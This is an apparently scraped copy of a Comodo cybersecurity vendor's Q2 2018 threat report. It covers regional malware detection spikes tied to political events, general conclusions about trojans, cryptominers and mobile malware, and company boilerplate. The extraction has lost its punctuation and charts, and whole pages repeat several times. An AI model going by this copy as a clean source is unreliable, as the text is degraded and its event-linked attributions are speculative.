The Lab also works with trusted partners in academia government and industry to gain additional insights into known and potential
threats CTRLrsquos mission is to use the best combination of cybersecurity technology and innovations machine
learning-powered analytics artificial intelligence and human experts and insights to secure and protect
Comodo Cybersecurity customers business and public-sector partners and the public community
Comodo Cybersecurity is a global innovator of cybersecurity solutions protecting critical information across the digital landscape Building on its unique position as the worldrsquos largest certificate authority Comodo Cybersecurity authenticates validates and secures networks and infrastructures from individuals to mid-sized companies to the worldrsquos largest enterprises Comodo Cybersecurity provides complete end-to-end security solutions across the boundary internal network and endpoint with innovative technologies solving the most advanced malware threats both known and unknown With global headquarters in Clifton New Jersey and branch offices in Silicon Valley Comodo Cybersecurity has international offices in China India the Philippines Romania Turkey Ukraine and the United Kingdom For more information visit comodocom Comodo Cybersecurity and The Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group Inc or its affiliates in the US and other countries Other names may be trademarks of their respective owners The current list of Comodo Cybersecurity trademarks and patents is available at comodocomrepository
About Comodo Cybersecurity
Brought to you by
- 1 Executive summary
-
- 11 Overview
- 12 New Trends
-
- 121 Trojans jumped to the top of the malware list
- 122 Cryptominers evolved into multifunctional malware
- 123 Android malware skyrocketed in variety
- 124 Geopolitical intelligence
-
- 2 Trojans going on the offensive to hunt for confidential data
-
- 21 The Most Widespread Trojan
- 22 PowerShell-based attack with Emotet
- 23 Flawed Ammyy RAT attack based on legitimate software
- 24 The growth of Flawed Ammyy attacks for Q2
- 25 Ammyy Admin dissemination around the world for Q2
-
- 3 Cryptominer Evolution
-
- Going Fileless Killing Competitors Crashing Systems
- 31 BadShell attacks enterprises
- 32 WinstarNssmMiner a system killer
- 33 CoinMiner kills rivals
- 34 CoinHive changes its skin
- 35 Cryptocurrency clipboard hijacker intercepts transfers
-
- 4 Android Devices Under Siege
-
- 41 Spying Stealing Mining
-
- 411 KevDroid
- 412 Zoo Park
- 413 MikeSpy
- 414 Xloader
- 415 Stalker Spy
- 416 Mystery Bot
- 417 FakeSpy
- 418 RedAlert
- 419 Hero Rat
- 4110 Sonvpay
- 4111 CoinHive
-
- 42 Android Malware Catalogued by Month
-
- 421 April 2018
- 422 May 2018
- 423 June 2018
-
- 5 Malware in Q2 2018 The Big Picture
-
- 51 Strategic Threat Computer Worms
-
- 511 Generic Worms
- 512 Net Worms
- 513 Email Worms
- 514 p2p Worms
- 515 IM Worms
-
- 52 High Threat Malware
-
- 521 Backdoors
- 522 Viruses
- 523 Trojans
- 524 Exploits
-
- 53 Medium Threat Malware
-
- 531 Constructor
- 532 Packers
- 533 Email Flooder
- 534 Virtual Tools
- 535 Jokes
-
- 54 Low Threat Malware Applications
-
- 541 Applications
- 542 Unwanted Applications
- 543 Unsafe Applications
-
- 6 Vertical analysis
- 7 Geopolitical Intelligence
-
- 71 USA
- 72 China
- 73 South Korea
- 74 North Korea
- 75 Armenia
- 76 Belarus
- 77 Iraq
- 78 Ukraine
- 79 Croatia
- 710 Finland Russia USA
-
- 8 Conclusions
-
Global Threat Report Q2 2018 Edition
Page 68 of 73
76 Belarus
A common hacker refrain is that ldquoinformation wants to be freerdquo Evidence for this argument is provided by this timeline which shows Comodorsquos Virus and Trojan detections in Belarus in Q2 2018 On June 14 as the government in Minsk passed new legislation with a view toward controlling the spread of ldquofake newsrdquo Comodo detected a massive spike in both viruses and trojans It is possible that the virus outbreak was specifically used to disseminate trojan horses which were then leveraged for some real-world purpose either to gather deny or manipulate sensitive information related to the new legislation and its impact on Belarus society
Global Threat Report Q2 2018 Edition
Page 69 of 73
77 Iraq
Today there is possibly no hotter topic in information security than election hacking In this chart showing Comodo malware detections in Iraq in Q2 2018 two clear spikes stand out that we must consider Both might be associated with recent electoral incidents In mid-April Iraq was preparing for a national election which included a conundrum on how best to secure its electronic dimension And at the beginning of July Iraq was preparing for a vote recount following accusations of impropriety at the polls
Global Threat Report Q2 2018 Edition
Page 70 of 73
78 Ukraine
Sometimes it is hard to know the reason for a specific spike in malware detection ndash and sometimes there may be multiple reasons In this timeline of Comodo malware detections in Ukraine in Q2 2018 there may have been multiple reasons for the highest spike on May 24 Both of the cited news stories are from May 23 the first discusses Ukrainersquos Independence Day as well as Ukrainersquos testing of new military weapons provided by the US government the second describes a cyberattack that Ukraine feared would target a major sporting event the Champions League final in Ukrainersquos capital city Kyiv on May 26
Global Threat Report Q2 2018 Edition
Page 71 of 73
79 Croatia
Since the cyberattack that targeted Estonia in 2007 it is clear that cyberattacks can be used to punish not only individuals and enterprises but also entire nations In that context this massive spike in malware detection in Croatia on March 28 is interesting as it came a mere day after the Russian government called a Croatian government decision to expel a Russian diplomat (in solidarity with London over the alleged poisoning of a former Russian spy in England) an ldquoact of hostilityrdquo
Global Threat Report Q2 2018 Edition
Page 72 of 73
710 Finland Russia USA
Finally letrsquos have a look at Comodorsquos virus detections in Finland during Q2 2018 The largest single spike ndash by far ndash occurred on the day when the press began to report that Donald Trump and Vladimir Putin would have a summit in the Finnish capital of Helsinki Geolocation of this Virus activity in Finland revealed that it almost exclusively took place in Helsinkirsquos suburb of Vantaa ndash precisely where the summit was scheduled to take place
Global Threat Report Q2 2018 Edition
Page 73 of 73
8 Conclusions In Q2 Comodo Cybersecurity observed several new significant trends likely to radically influence the cybersecurity marketplace and IT end users These trends not only demonstrate an upswing in malware across the world but presage possible future cybersecurity scenarios
The fact that trojan malware increased in the last quarter means that the spread of malware in general will be amplified soon Trojans are a covert weapon and the cybersecurity industry should suppose that many trojan-based attacks that occurred in Q2 remain undetected with the real impact of these attacks being revealed in quarters to come Another meaningful fact is that trojans serve as a delivery vector for other types of malware Combined these facts point to a huge surge in infection of hosts worldwide with a diversity of malware samples
Our findings show that malware is becoming more cunning in delivery method sophisticated in persistence and much harder to detect by antivirus software Propagation of fileless malware the evolution of cryptominers and using legitimate tools like PowerShell to attack are clear evidence of this uptick in sophistication
Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets contain a variety of valuable information but lack protection comparable to that on desktop systems presaging new attacks and mobile malware development As more people use their mobile devices for financial transactions (via banking and e-payment apps) and store confidential information (like messenger correspondence and private pictures) cybercriminals can anticipate rich pickings from exploiting those devices With successful penetration perpetrators profit by stealing money selling confidential information or blackmailing victims
Moreover given that the majority of detected trojans in Q2 were information stealers we can see another dangerous tendency the accelerating of cybercriminalsrsquo bias to hunt for confidential data
Combined these trends promise a heavy impact on the cybersecurity marketplace and on IT end-users in the future creating changes in the cybersecurity landscape and forcing IT-security departments to update their security measures and probably revamp their security strategy policies and postures
NORTH AMERICA―
EUROPE―
ASIA―
REQUEST A DEMO Try Comodo Cybersecurity by speaking with
a security consultant to begin the process to set up a demo or proof-of-concept project
Contact us directly at +1 888-266-6361
copy 2018 ALL RIGHTS RESERVED COMODO SECURITY SOLUTIONS INC
VISIT COMODOCOM
Comodo Security Solutions Inc1255 Broad StreetClifton NJ 07013United StatesTel +1 (888) 551 1531Tel +1 (888) 266 6361Int +1 (703) 581 6361Fax +1 (973) 777 4394salescomodocom
Comodo Security Solutions IncȘoseaua Națională 31 Iași 700237Romania Europe+40 332 806 772
Comodo Security Solutions Pvt LtdPrestige Office Centre183 NSK Salai VadapalaniChennai IndiaTe +91 44 4562 2800wwwcomodocoin
Comodo Threat Research Labs monitors filters and analyzes malware ransomware viruses and other ldquounknownrdquo potentially dangerous files 247365 in over 190
countries around the world With 5 offices spread across the Americas Asia and Europe (and staff covering over 190 countries) the Lab is made up of more
than 220 IT security professionals ethical hackers computer scientists and engineers (all full-time Comodo Cybersecurity Lab employees) analyzing
millions of potential pieces of malware phishing spam or other maliciousunwanted files and emails every day
The Lab also works with trusted partners in academia government and industry to gain additional insights into known and potential
threats CTRLrsquos mission is to use the best combination of cybersecurity technology and innovations machine
learning-powered analytics artificial intelligence and human experts and insights to secure and protect
Comodo Cybersecurity customers business and public-sector partners and the public community
Comodo Cybersecurity is a global innovator of cybersecurity solutions protecting critical information across the digital landscape Building on its unique position as the worldrsquos largest certificate authority Comodo Cybersecurity authenticates validates and secures networks and infrastructures from individuals to mid-sized companies to the worldrsquos largest enterprises Comodo Cybersecurity provides complete end-to-end security solutions across the boundary internal network and endpoint with innovative technologies solving the most advanced malware threats both known and unknown With global headquarters in Clifton New Jersey and branch offices in Silicon Valley Comodo Cybersecurity has international offices in China India the Philippines Romania Turkey Ukraine and the United Kingdom For more information visit comodocom Comodo Cybersecurity and The Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group Inc or its affiliates in the US and other countries Other names may be trademarks of their respective owners The current list of Comodo Cybersecurity trademarks and patents is available at comodocomrepository
About Comodo Cybersecurity
Brought to you by
- 1 Executive summary
-
- 11 Overview
- 12 New Trends
-
- 121 Trojans jumped to the top of the malware list
- 122 Cryptominers evolved into multifunctional malware
- 123 Android malware skyrocketed in variety
- 124 Geopolitical intelligence
-
- 2 Trojans going on the offensive to hunt for confidential data
-
- 21 The Most Widespread Trojan
- 22 PowerShell-based attack with Emotet
- 23 Flawed Ammyy RAT attack based on legitimate software
- 24 The growth of Flawed Ammyy attacks for Q2
- 25 Ammyy Admin dissemination around the world for Q2
-
- 3 Cryptominer Evolution
-
- Going Fileless Killing Competitors Crashing Systems
- 31 BadShell attacks enterprises
- 32 WinstarNssmMiner a system killer
- 33 CoinMiner kills rivals
- 34 CoinHive changes its skin
- 35 Cryptocurrency clipboard hijacker intercepts transfers
-
- 4 Android Devices Under Siege
-
- 41 Spying Stealing Mining
-
- 411 KevDroid
- 412 Zoo Park
- 413 MikeSpy
- 414 Xloader
- 415 Stalker Spy
- 416 Mystery Bot
- 417 FakeSpy
- 418 RedAlert
- 419 Hero Rat
- 4110 Sonvpay
- 4111 CoinHive
-
- 42 Android Malware Catalogued by Month
-
- 421 April 2018
- 422 May 2018
- 423 June 2018
-
- 5 Malware in Q2 2018 The Big Picture
-
- 51 Strategic Threat Computer Worms
-
- 511 Generic Worms
- 512 Net Worms
- 513 Email Worms
- 514 p2p Worms
- 515 IM Worms
-
- 52 High Threat Malware
-
- 521 Backdoors
- 522 Viruses
- 523 Trojans
- 524 Exploits
-
- 53 Medium Threat Malware
-
- 531 Constructor
- 532 Packers
- 533 Email Flooder
- 534 Virtual Tools
- 535 Jokes
-
- 54 Low Threat Malware Applications
-
- 541 Applications
- 542 Unwanted Applications
- 543 Unsafe Applications
-
- 6 Vertical analysis
- 7 Geopolitical Intelligence
-
- 71 USA
- 72 China
- 73 South Korea
- 74 North Korea
- 75 Armenia
- 76 Belarus
- 77 Iraq
- 78 Ukraine
- 79 Croatia
- 710 Finland Russia USA
-
- 8 Conclusions
-
Global Threat Report Q2 2018 Edition
Page 69 of 73
77 Iraq
Today there is possibly no hotter topic in information security than election hacking In this chart showing Comodo malware detections in Iraq in Q2 2018 two clear spikes stand out that we must consider Both might be associated with recent electoral incidents In mid-April Iraq was preparing for a national election which included a conundrum on how best to secure its electronic dimension And at the beginning of July Iraq was preparing for a vote recount following accusations of impropriety at the polls
Global Threat Report Q2 2018 Edition
Page 70 of 73
78 Ukraine
Sometimes it is hard to know the reason for a specific spike in malware detection ndash and sometimes there may be multiple reasons In this timeline of Comodo malware detections in Ukraine in Q2 2018 there may have been multiple reasons for the highest spike on May 24 Both of the cited news stories are from May 23 the first discusses Ukrainersquos Independence Day as well as Ukrainersquos testing of new military weapons provided by the US government the second describes a cyberattack that Ukraine feared would target a major sporting event the Champions League final in Ukrainersquos capital city Kyiv on May 26
Global Threat Report Q2 2018 Edition
Page 71 of 73
79 Croatia
Since the cyberattack that targeted Estonia in 2007 it is clear that cyberattacks can be used to punish not only individuals and enterprises but also entire nations In that context this massive spike in malware detection in Croatia on March 28 is interesting as it came a mere day after the Russian government called a Croatian government decision to expel a Russian diplomat (in solidarity with London over the alleged poisoning of a former Russian spy in England) an ldquoact of hostilityrdquo
Global Threat Report Q2 2018 Edition
Page 72 of 73
710 Finland Russia USA
Finally letrsquos have a look at Comodorsquos virus detections in Finland during Q2 2018 The largest single spike ndash by far ndash occurred on the day when the press began to report that Donald Trump and Vladimir Putin would have a summit in the Finnish capital of Helsinki Geolocation of this Virus activity in Finland revealed that it almost exclusively took place in Helsinkirsquos suburb of Vantaa ndash precisely where the summit was scheduled to take place
Global Threat Report Q2 2018 Edition
Page 73 of 73
8 Conclusions In Q2 Comodo Cybersecurity observed several new significant trends likely to radically influence the cybersecurity marketplace and IT end users These trends not only demonstrate an upswing in malware across the world but presage possible future cybersecurity scenarios
The fact that trojan malware increased in the last quarter means that the spread of malware in general will be amplified soon Trojans are a covert weapon and the cybersecurity industry should suppose that many trojan-based attacks that occurred in Q2 remain undetected with the real impact of these attacks being revealed in quarters to come Another meaningful fact is that trojans serve as a delivery vector for other types of malware Combined these facts point to a huge surge in infection of hosts worldwide with a diversity of malware samples
Our findings show that malware is becoming more cunning in delivery method sophisticated in persistence and much harder to detect by antivirus software Propagation of fileless malware the evolution of cryptominers and using legitimate tools like PowerShell to attack are clear evidence of this uptick in sophistication
Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets contain a variety of valuable information but lack protection comparable to that on desktop systems presaging new attacks and mobile malware development As more people use their mobile devices for financial transactions (via banking and e-payment apps) and store confidential information (like messenger correspondence and private pictures) cybercriminals can anticipate rich pickings from exploiting those devices With successful penetration perpetrators profit by stealing money selling confidential information or blackmailing victims
Moreover given that the majority of detected trojans in Q2 were information stealers we can see another dangerous tendency the accelerating of cybercriminalsrsquo bias to hunt for confidential data
Combined these trends promise a heavy impact on the cybersecurity marketplace and on IT end-users in the future creating changes in the cybersecurity landscape and forcing IT-security departments to update their security measures and probably revamp their security strategy policies and postures
NORTH AMERICA―
EUROPE―
ASIA―
REQUEST A DEMO Try Comodo Cybersecurity by speaking with
a security consultant to begin the process to set up a demo or proof-of-concept project
Contact us directly at +1 888-266-6361
copy 2018 ALL RIGHTS RESERVED COMODO SECURITY SOLUTIONS INC
VISIT COMODOCOM
Comodo Security Solutions Inc1255 Broad StreetClifton NJ 07013United StatesTel +1 (888) 551 1531Tel +1 (888) 266 6361Int +1 (703) 581 6361Fax +1 (973) 777 4394salescomodocom
Comodo Security Solutions IncȘoseaua Națională 31 Iași 700237Romania Europe+40 332 806 772
Comodo Security Solutions Pvt LtdPrestige Office Centre183 NSK Salai VadapalaniChennai IndiaTe +91 44 4562 2800wwwcomodocoin
Comodo Threat Research Labs monitors filters and analyzes malware ransomware viruses and other ldquounknownrdquo potentially dangerous files 247365 in over 190
countries around the world With 5 offices spread across the Americas Asia and Europe (and staff covering over 190 countries) the Lab is made up of more
than 220 IT security professionals ethical hackers computer scientists and engineers (all full-time Comodo Cybersecurity Lab employees) analyzing
millions of potential pieces of malware phishing spam or other maliciousunwanted files and emails every day
The Lab also works with trusted partners in academia government and industry to gain additional insights into known and potential
threats CTRLrsquos mission is to use the best combination of cybersecurity technology and innovations machine
learning-powered analytics artificial intelligence and human experts and insights to secure and protect
Comodo Cybersecurity customers business and public-sector partners and the public community
Comodo Cybersecurity is a global innovator of cybersecurity solutions protecting critical information across the digital landscape Building on its unique position as the worldrsquos largest certificate authority Comodo Cybersecurity authenticates validates and secures networks and infrastructures from individuals to mid-sized companies to the worldrsquos largest enterprises Comodo Cybersecurity provides complete end-to-end security solutions across the boundary internal network and endpoint with innovative technologies solving the most advanced malware threats both known and unknown With global headquarters in Clifton New Jersey and branch offices in Silicon Valley Comodo Cybersecurity has international offices in China India the Philippines Romania Turkey Ukraine and the United Kingdom For more information visit comodocom Comodo Cybersecurity and The Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group Inc or its affiliates in the US and other countries Other names may be trademarks of their respective owners The current list of Comodo Cybersecurity trademarks and patents is available at comodocomrepository
About Comodo Cybersecurity
Brought to you by
- 1 Executive summary
-
- 11 Overview
- 12 New Trends
-
- 121 Trojans jumped to the top of the malware list
- 122 Cryptominers evolved into multifunctional malware
- 123 Android malware skyrocketed in variety
- 124 Geopolitical intelligence
-
- 2 Trojans going on the offensive to hunt for confidential data
-
- 21 The Most Widespread Trojan
- 22 PowerShell-based attack with Emotet
- 23 Flawed Ammyy RAT attack based on legitimate software
- 24 The growth of Flawed Ammyy attacks for Q2
- 25 Ammyy Admin dissemination around the world for Q2
-
- 3 Cryptominer Evolution
-
- Going Fileless Killing Competitors Crashing Systems
- 31 BadShell attacks enterprises
- 32 WinstarNssmMiner a system killer
- 33 CoinMiner kills rivals
- 34 CoinHive changes its skin
- 35 Cryptocurrency clipboard hijacker intercepts transfers
-
- 4 Android Devices Under Siege
-
- 41 Spying Stealing Mining
-
- 411 KevDroid
- 412 Zoo Park
- 413 MikeSpy
- 414 Xloader
- 415 Stalker Spy
- 416 Mystery Bot
- 417 FakeSpy
- 418 RedAlert
- 419 Hero Rat
- 4110 Sonvpay
- 4111 CoinHive
-
- 42 Android Malware Catalogued by Month
-
- 421 April 2018
- 422 May 2018
- 423 June 2018
-
- 5 Malware in Q2 2018 The Big Picture
-
- 51 Strategic Threat Computer Worms
-
- 511 Generic Worms
- 512 Net Worms
- 513 Email Worms
- 514 p2p Worms
- 515 IM Worms
-
- 52 High Threat Malware
-
- 521 Backdoors
- 522 Viruses
- 523 Trojans
- 524 Exploits
-
- 53 Medium Threat Malware
-
- 531 Constructor
- 532 Packers
- 533 Email Flooder
- 534 Virtual Tools
- 535 Jokes
-
- 54 Low Threat Malware Applications
-
- 541 Applications
- 542 Unwanted Applications
- 543 Unsafe Applications
-
- 6 Vertical analysis
- 7 Geopolitical Intelligence
-
- 71 USA
- 72 China
- 73 South Korea
- 74 North Korea
- 75 Armenia
- 76 Belarus
- 77 Iraq
- 78 Ukraine
- 79 Croatia
- 710 Finland Russia USA
-
- 8 Conclusions
-
Global Threat Report Q2 2018 Edition
Page 70 of 73
78 Ukraine
Sometimes it is hard to know the reason for a specific spike in malware detection ndash and sometimes there may be multiple reasons In this timeline of Comodo malware detections in Ukraine in Q2 2018 there may have been multiple reasons for the highest spike on May 24 Both of the cited news stories are from May 23 the first discusses Ukrainersquos Independence Day as well as Ukrainersquos testing of new military weapons provided by the US government the second describes a cyberattack that Ukraine feared would target a major sporting event the Champions League final in Ukrainersquos capital city Kyiv on May 26
Global Threat Report Q2 2018 Edition
Page 71 of 73
79 Croatia
Since the cyberattack that targeted Estonia in 2007 it is clear that cyberattacks can be used to punish not only individuals and enterprises but also entire nations In that context this massive spike in malware detection in Croatia on March 28 is interesting as it came a mere day after the Russian government called a Croatian government decision to expel a Russian diplomat (in solidarity with London over the alleged poisoning of a former Russian spy in England) an ldquoact of hostilityrdquo
Global Threat Report Q2 2018 Edition
Page 72 of 73
710 Finland Russia USA
Finally letrsquos have a look at Comodorsquos virus detections in Finland during Q2 2018 The largest single spike ndash by far ndash occurred on the day when the press began to report that Donald Trump and Vladimir Putin would have a summit in the Finnish capital of Helsinki Geolocation of this Virus activity in Finland revealed that it almost exclusively took place in Helsinkirsquos suburb of Vantaa ndash precisely where the summit was scheduled to take place
Global Threat Report Q2 2018 Edition
Page 73 of 73
8 Conclusions In Q2 Comodo Cybersecurity observed several new significant trends likely to radically influence the cybersecurity marketplace and IT end users These trends not only demonstrate an upswing in malware across the world but presage possible future cybersecurity scenarios
The fact that trojan malware increased in the last quarter means that the spread of malware in general will be amplified soon Trojans are a covert weapon and the cybersecurity industry should suppose that many trojan-based attacks that occurred in Q2 remain undetected with the real impact of these attacks being revealed in quarters to come Another meaningful fact is that trojans serve as a delivery vector for other types of malware Combined these facts point to a huge surge in infection of hosts worldwide with a diversity of malware samples
Our findings show that malware is becoming more cunning in delivery method sophisticated in persistence and much harder to detect by antivirus software Propagation of fileless malware the evolution of cryptominers and using legitimate tools like PowerShell to attack are clear evidence of this uptick in sophistication
Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets contain a variety of valuable information but lack protection comparable to that on desktop systems presaging new attacks and mobile malware development As more people use their mobile devices for financial transactions (via banking and e-payment apps) and store confidential information (like messenger correspondence and private pictures) cybercriminals can anticipate rich pickings from exploiting those devices With successful penetration perpetrators profit by stealing money selling confidential information or blackmailing victims
Moreover given that the majority of detected trojans in Q2 were information stealers we can see another dangerous tendency the accelerating of cybercriminalsrsquo bias to hunt for confidential data
Combined these trends promise a heavy impact on the cybersecurity marketplace and on IT end-users in the future creating changes in the cybersecurity landscape and forcing IT-security departments to update their security measures and probably revamp their security strategy policies and postures
NORTH AMERICA―
EUROPE―
ASIA―
REQUEST A DEMO Try Comodo Cybersecurity by speaking with
a security consultant to begin the process to set up a demo or proof-of-concept project
Contact us directly at +1 888-266-6361
copy 2018 ALL RIGHTS RESERVED COMODO SECURITY SOLUTIONS INC
VISIT COMODOCOM
Comodo Security Solutions Inc1255 Broad StreetClifton NJ 07013United StatesTel +1 (888) 551 1531Tel +1 (888) 266 6361Int +1 (703) 581 6361Fax +1 (973) 777 4394salescomodocom
Comodo Security Solutions IncȘoseaua Națională 31 Iași 700237Romania Europe+40 332 806 772
Comodo Security Solutions Pvt LtdPrestige Office Centre183 NSK Salai VadapalaniChennai IndiaTe +91 44 4562 2800wwwcomodocoin
Comodo Threat Research Labs monitors filters and analyzes malware ransomware viruses and other ldquounknownrdquo potentially dangerous files 247365 in over 190
countries around the world With 5 offices spread across the Americas Asia and Europe (and staff covering over 190 countries) the Lab is made up of more
than 220 IT security professionals ethical hackers computer scientists and engineers (all full-time Comodo Cybersecurity Lab employees) analyzing
millions of potential pieces of malware phishing spam or other maliciousunwanted files and emails every day
The Lab also works with trusted partners in academia government and industry to gain additional insights into known and potential
threats CTRLrsquos mission is to use the best combination of cybersecurity technology and innovations machine
learning-powered analytics artificial intelligence and human experts and insights to secure and protect
Comodo Cybersecurity customers business and public-sector partners and the public community
Comodo Cybersecurity is a global innovator of cybersecurity solutions protecting critical information across the digital landscape Building on its unique position as the worldrsquos largest certificate authority Comodo Cybersecurity authenticates validates and secures networks and infrastructures from individuals to mid-sized companies to the worldrsquos largest enterprises Comodo Cybersecurity provides complete end-to-end security solutions across the boundary internal network and endpoint with innovative technologies solving the most advanced malware threats both known and unknown With global headquarters in Clifton New Jersey and branch offices in Silicon Valley Comodo Cybersecurity has international offices in China India the Philippines Romania Turkey Ukraine and the United Kingdom For more information visit comodocom Comodo Cybersecurity and The Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group Inc or its affiliates in the US and other countries Other names may be trademarks of their respective owners The current list of Comodo Cybersecurity trademarks and patents is available at comodocomrepository
About Comodo Cybersecurity
Brought to you by
- 1 Executive summary
-
- 11 Overview
- 12 New Trends
-
- 121 Trojans jumped to the top of the malware list
- 122 Cryptominers evolved into multifunctional malware
- 123 Android malware skyrocketed in variety
- 124 Geopolitical intelligence
-
- 2 Trojans going on the offensive to hunt for confidential data
-
- 21 The Most Widespread Trojan
- 22 PowerShell-based attack with Emotet
- 23 Flawed Ammyy RAT attack based on legitimate software
- 24 The growth of Flawed Ammyy attacks for Q2
- 25 Ammyy Admin dissemination around the world for Q2
-
- 3 Cryptominer Evolution
-
- Going Fileless Killing Competitors Crashing Systems
- 31 BadShell attacks enterprises
- 32 WinstarNssmMiner a system killer
- 33 CoinMiner kills rivals
- 34 CoinHive changes its skin
- 35 Cryptocurrency clipboard hijacker intercepts transfers
-
- 4 Android Devices Under Siege
-
- 41 Spying Stealing Mining
-
- 411 KevDroid
- 412 Zoo Park
- 413 MikeSpy
- 414 Xloader
- 415 Stalker Spy
- 416 Mystery Bot
- 417 FakeSpy
- 418 RedAlert
- 419 Hero Rat
- 4110 Sonvpay
- 4111 CoinHive
-
- 42 Android Malware Catalogued by Month
-
- 421 April 2018
- 422 May 2018
- 423 June 2018
-
- 5 Malware in Q2 2018 The Big Picture
-
- 51 Strategic Threat Computer Worms
-
- 511 Generic Worms
- 512 Net Worms
- 513 Email Worms
- 514 p2p Worms
- 515 IM Worms
-
- 52 High Threat Malware
-
- 521 Backdoors
- 522 Viruses
- 523 Trojans
- 524 Exploits
-
- 53 Medium Threat Malware
-
- 531 Constructor
- 532 Packers
- 533 Email Flooder
- 534 Virtual Tools
- 535 Jokes
-
- 54 Low Threat Malware Applications
-
- 541 Applications
- 542 Unwanted Applications
- 543 Unsafe Applications
-
- 6 Vertical analysis
- 7 Geopolitical Intelligence
-
- 71 USA
- 72 China
- 73 South Korea
- 74 North Korea
- 75 Armenia
- 76 Belarus
- 77 Iraq
- 78 Ukraine
- 79 Croatia
- 710 Finland Russia USA
-
- 8 Conclusions
-
Global Threat Report Q2 2018 Edition
Page 71 of 73
79 Croatia
Since the cyberattack that targeted Estonia in 2007 it is clear that cyberattacks can be used to punish not only individuals and enterprises but also entire nations In that context this massive spike in malware detection in Croatia on March 28 is interesting as it came a mere day after the Russian government called a Croatian government decision to expel a Russian diplomat (in solidarity with London over the alleged poisoning of a former Russian spy in England) an ldquoact of hostilityrdquo
Global Threat Report Q2 2018 Edition
Page 72 of 73
710 Finland Russia USA
Finally letrsquos have a look at Comodorsquos virus detections in Finland during Q2 2018 The largest single spike ndash by far ndash occurred on the day when the press began to report that Donald Trump and Vladimir Putin would have a summit in the Finnish capital of Helsinki Geolocation of this Virus activity in Finland revealed that it almost exclusively took place in Helsinkirsquos suburb of Vantaa ndash precisely where the summit was scheduled to take place
Global Threat Report Q2 2018 Edition
Page 73 of 73
8 Conclusions In Q2 Comodo Cybersecurity observed several new significant trends likely to radically influence the cybersecurity marketplace and IT end users These trends not only demonstrate an upswing in malware across the world but presage possible future cybersecurity scenarios
The fact that trojan malware increased in the last quarter means that the spread of malware in general will be amplified soon Trojans are a covert weapon and the cybersecurity industry should suppose that many trojan-based attacks that occurred in Q2 remain undetected with the real impact of these attacks being revealed in quarters to come Another meaningful fact is that trojans serve as a delivery vector for other types of malware Combined these facts point to a huge surge in infection of hosts worldwide with a diversity of malware samples
Our findings show that malware is becoming more cunning in delivery method sophisticated in persistence and much harder to detect by antivirus software Propagation of fileless malware the evolution of cryptominers and using legitimate tools like PowerShell to attack are clear evidence of this uptick in sophistication
Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets contain a variety of valuable information but lack protection comparable to that on desktop systems presaging new attacks and mobile malware development As more people use their mobile devices for financial transactions (via banking and e-payment apps) and store confidential information (like messenger correspondence and private pictures) cybercriminals can anticipate rich pickings from exploiting those devices With successful penetration perpetrators profit by stealing money selling confidential information or blackmailing victims
Moreover given that the majority of detected trojans in Q2 were information stealers we can see another dangerous tendency the accelerating of cybercriminalsrsquo bias to hunt for confidential data
Combined these trends promise a heavy impact on the cybersecurity marketplace and on IT end-users in the future creating changes in the cybersecurity landscape and forcing IT-security departments to update their security measures and probably revamp their security strategy policies and postures
NORTH AMERICA―
EUROPE―
ASIA―
REQUEST A DEMO Try Comodo Cybersecurity by speaking with
a security consultant to begin the process to set up a demo or proof-of-concept project
Contact us directly at +1 888-266-6361
copy 2018 ALL RIGHTS RESERVED COMODO SECURITY SOLUTIONS INC
VISIT COMODOCOM
Comodo Security Solutions Inc1255 Broad StreetClifton NJ 07013United StatesTel +1 (888) 551 1531Tel +1 (888) 266 6361Int +1 (703) 581 6361Fax +1 (973) 777 4394salescomodocom
Comodo Security Solutions IncȘoseaua Națională 31 Iași 700237Romania Europe+40 332 806 772
Comodo Security Solutions Pvt LtdPrestige Office Centre183 NSK Salai VadapalaniChennai IndiaTe +91 44 4562 2800wwwcomodocoin
Comodo Threat Research Labs monitors filters and analyzes malware ransomware viruses and other ldquounknownrdquo potentially dangerous files 247365 in over 190
countries around the world With 5 offices spread across the Americas Asia and Europe (and staff covering over 190 countries) the Lab is made up of more
than 220 IT security professionals ethical hackers computer scientists and engineers (all full-time Comodo Cybersecurity Lab employees) analyzing
millions of potential pieces of malware phishing spam or other maliciousunwanted files and emails every day
The Lab also works with trusted partners in academia government and industry to gain additional insights into known and potential
threats CTRLrsquos mission is to use the best combination of cybersecurity technology and innovations machine
learning-powered analytics artificial intelligence and human experts and insights to secure and protect
Comodo Cybersecurity customers business and public-sector partners and the public community
Comodo Cybersecurity is a global innovator of cybersecurity solutions protecting critical information across the digital landscape Building on its unique position as the worldrsquos largest certificate authority Comodo Cybersecurity authenticates validates and secures networks and infrastructures from individuals to mid-sized companies to the worldrsquos largest enterprises Comodo Cybersecurity provides complete end-to-end security solutions across the boundary internal network and endpoint with innovative technologies solving the most advanced malware threats both known and unknown With global headquarters in Clifton New Jersey and branch offices in Silicon Valley Comodo Cybersecurity has international offices in China India the Philippines Romania Turkey Ukraine and the United Kingdom For more information visit comodocom Comodo Cybersecurity and The Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group Inc or its affiliates in the US and other countries Other names may be trademarks of their respective owners The current list of Comodo Cybersecurity trademarks and patents is available at comodocomrepository
About Comodo Cybersecurity
Brought to you by
- 1 Executive summary
-
- 11 Overview
- 12 New Trends
-
- 121 Trojans jumped to the top of the malware list
- 122 Cryptominers evolved into multifunctional malware
- 123 Android malware skyrocketed in variety
- 124 Geopolitical intelligence
-
- 2 Trojans going on the offensive to hunt for confidential data
-
- 21 The Most Widespread Trojan
- 22 PowerShell-based attack with Emotet
- 23 Flawed Ammyy RAT attack based on legitimate software
- 24 The growth of Flawed Ammyy attacks for Q2
- 25 Ammyy Admin dissemination around the world for Q2
-
- 3 Cryptominer Evolution
-
- Going Fileless Killing Competitors Crashing Systems
- 31 BadShell attacks enterprises
- 32 WinstarNssmMiner a system killer
- 33 CoinMiner kills rivals
- 34 CoinHive changes its skin
- 35 Cryptocurrency clipboard hijacker intercepts transfers
-
- 4 Android Devices Under Siege
-
- 41 Spying Stealing Mining
-
- 411 KevDroid
- 412 Zoo Park
- 413 MikeSpy
- 414 Xloader
- 415 Stalker Spy
- 416 Mystery Bot
- 417 FakeSpy
- 418 RedAlert
- 419 Hero Rat
- 4110 Sonvpay
- 4111 CoinHive
-
